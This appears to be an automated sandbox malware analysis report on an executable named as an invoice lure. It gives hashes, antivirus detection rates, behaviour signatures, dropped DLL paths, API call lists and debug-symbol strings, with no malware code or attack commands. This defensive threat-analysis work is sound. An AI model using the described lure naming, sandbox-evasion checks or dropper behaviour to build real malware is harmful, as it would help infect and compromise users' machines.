Play interactive tour

Edit tour

Analysis Report Invoice 6500TH21Y5674.exe

Overview

General Information

Sample Name:	Invoice 6500TH21Y5674.exe
Analysis ID:	356249
MD5:	dc22d7783144cfe4dcbb4734ed6a3656
SHA1:	65d3e4f4df34bb25f7b621dd0457c641f98029cb
SHA256:	c9fc9a54366452a99c7ed753c7f5055141bc579b1a2530f8db7d7a039db6225d
Tags:	exe
Most interesting Screenshot:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Executable has a suspicious name (potential lure to open the executable)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Detected potential crypto function

Drops PE files

One or more processes crash

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

Invoice 6500TH21Y5674.exe (PID: 6928 cmdline: 'C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe' MD5: DC22D7783144CFE4DCBB4734ED6A3656)

WerFault.exe (PID: 7116 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 736 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\ir9ehshgyir.dll	Virustotal: Detection: 33%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\ir9ehshgyir.dll	ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Show sources

Source: Invoice 6500TH21Y5674.exe

ReversingLabs: Detection: 53%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\ir9ehshgyir.dll

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: Invoice 6500TH21Y5674.exe

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Show sources

Source: Invoice 6500TH21Y5674.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: Invoice 6500TH21Y5674.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: userenv.pdb> source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb2 source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.666812842.0000000004D0F000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb\ source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.672610626.00000000052B1000.00000004.00000040.sdmp
Source:	Binary string: ColorAdapterClient.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.672571387.0000000005101000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdbH source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.672571387.0000000005101000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000005.00000003.667774393.0000000002E62000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000005.00000003.672610626.00000000052B1000.00000004.00000040.sdmp
Source:	Binary string: riched20.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: oleacc.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.672712202.00000000052B0000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.672571387.0000000005101000.00000004.00000001.sdmp
Source:	Binary string: comctl32v582.pdbE source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.672571387.0000000005101000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000005.00000003.672571387.0000000005101000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdbB source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: msi.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: ntmarta.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: CLBCatQ.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdbP source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: version.pdb` source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.667332189.0000000002E6E000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: userenv.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000005.00000003.672712202.00000000052B0000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb$ source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: usp10.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: crypt32.pdb@ source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: rtutils.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000005.00000003.667774393.0000000002E62000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000005.00000003.672610626.00000000052B1000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000005.00000003.672712202.00000000052B0000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000005.00000003.672571387.0000000005101000.00000004.00000001.sdmp
Source:	Binary string: shfolder.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: ntmarta.pdbt source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdbN source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: shfolder.pdbE source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000005.00000003.672610626.00000000052B1000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000005.00000003.672610626.00000000052B1000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb8 source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdbz source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: version.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdbf source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: mscms.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: msasn1.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.672712202.00000000052B0000.00000004.00000040.sdmp
Source:	Binary string: comctl32v582.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.672571387.0000000005101000.00000004.00000001.sdmp
Source:	Binary string: wUxTheme.pdb* source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000005.00000003.667332189.0000000002E6E000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000005.00000003.672610626.00000000052B1000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000005.00000003.672571387.0000000005101000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.672610626.00000000052B1000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000005.00000003.672712202.00000000052B0000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdbF source: WerFault.exe, 00000005.00000003.672712202.00000000052B0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdbk source: WerFault.exe, 00000005.00000003.672610626.00000000052B1000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdbV source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: msls31.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: crypt32.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp

Spreading:

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe	Code function: 0_2_00406448 FindFirstFileA,FindClose,	0_2_00406448
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe	Code function: 0_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_0040589C
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1

Networking:

Source: Invoice 6500TH21Y5674.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Invoice 6500TH21Y5674.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe

Code function: 0_2_00405339 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405339

System Summary:

Executable has a suspicious name (potential lure to open the executable)

Show sources

Source: Invoice 6500TH21Y5674.exe

Static file information: Suspicious name

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Invoice 6500TH21Y5674.exe

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe

Code function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403325

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe

Code function: 0_2_72AB1A98

0_2_72AB1A98

Source: unknown

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 736

Source: Invoice 6500TH21Y5674.exe, 00000000.00000002.687423343.0000000000D40000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs Invoice 6500TH21Y5674.exe
Source: Invoice 6500TH21Y5674.exe, 00000000.00000002.686919527.0000000000950000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameOLEACCRC.DLLj% vs Invoice 6500TH21Y5674.exe

Source: Invoice 6500TH21Y5674.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal72.winEXE@2/7@0/0

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe

0_2_00403325

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe

Code function: 0_2_004045EA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004045EA

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe

Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,

0_2_0040216B

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6928

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe

File created: C:\Users\user\AppData\Local\Temp\nsh10FD.tmp

Jump to behavior

Source: Invoice 6500TH21Y5674.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Invoice 6500TH21Y5674.exe

ReversingLabs: Detection: 53%

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe

File read: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe 'C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 736

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Invoice 6500TH21Y5674.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: userenv.pdb> source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb2 source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.666812842.0000000004D0F000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb\ source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.672610626.00000000052B1000.00000004.00000040.sdmp
Source:	Binary string: ColorAdapterClient.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.672571387.0000000005101000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdbH source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.672571387.0000000005101000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000005.00000003.667774393.0000000002E62000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000005.00000003.672610626.00000000052B1000.00000004.00000040.sdmp
Source:	Binary string: riched20.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: oleacc.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.672712202.00000000052B0000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.672571387.0000000005101000.00000004.00000001.sdmp
Source:	Binary string: comctl32v582.pdbE source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.672571387.0000000005101000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000005.00000003.672571387.0000000005101000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdbB source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: msi.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: ntmarta.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: CLBCatQ.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdbP source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: version.pdb` source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.667332189.0000000002E6E000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: userenv.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000005.00000003.672712202.00000000052B0000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb$ source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: usp10.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: crypt32.pdb@ source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: rtutils.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000005.00000003.667774393.0000000002E62000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000005.00000003.672610626.00000000052B1000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000005.00000003.672712202.00000000052B0000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000005.00000003.672571387.0000000005101000.00000004.00000001.sdmp
Source:	Binary string: shfolder.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: ntmarta.pdbt source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdbN source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: shfolder.pdbE source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000005.00000003.672610626.00000000052B1000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000005.00000003.672610626.00000000052B1000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb8 source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdbz source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: version.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdbf source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: mscms.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: msasn1.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.672712202.00000000052B0000.00000004.00000040.sdmp
Source:	Binary string: comctl32v582.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.672571387.0000000005101000.00000004.00000001.sdmp
Source:	Binary string: wUxTheme.pdb* source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000005.00000003.667332189.0000000002E6E000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000005.00000003.672610626.00000000052B1000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000005.00000003.672571387.0000000005101000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.672610626.00000000052B1000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000005.00000003.672712202.00000000052B0000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdbF source: WerFault.exe, 00000005.00000003.672712202.00000000052B0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdbk source: WerFault.exe, 00000005.00000003.672610626.00000000052B1000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdbV source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: msls31.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp
Source:	Binary string: crypt32.pdb source: WerFault.exe, 00000005.00000003.672737412.00000000052B7000.00000004.00000040.sdmp

Data Obfuscation:

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe

Code function: 0_2_72AB1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_72AB1A98

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe

Code function: 0_2_72AB2F60 push eax; ret

0_2_72AB2F8E

Source: initial sample

Static PE information: section name: .data entropy: 7.27709924336

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe	File created: C:\Users\user\AppData\Local\Temp\nsb112C.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe	File created: C:\Users\user\AppData\Local\Temp\ir9ehshgyir.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
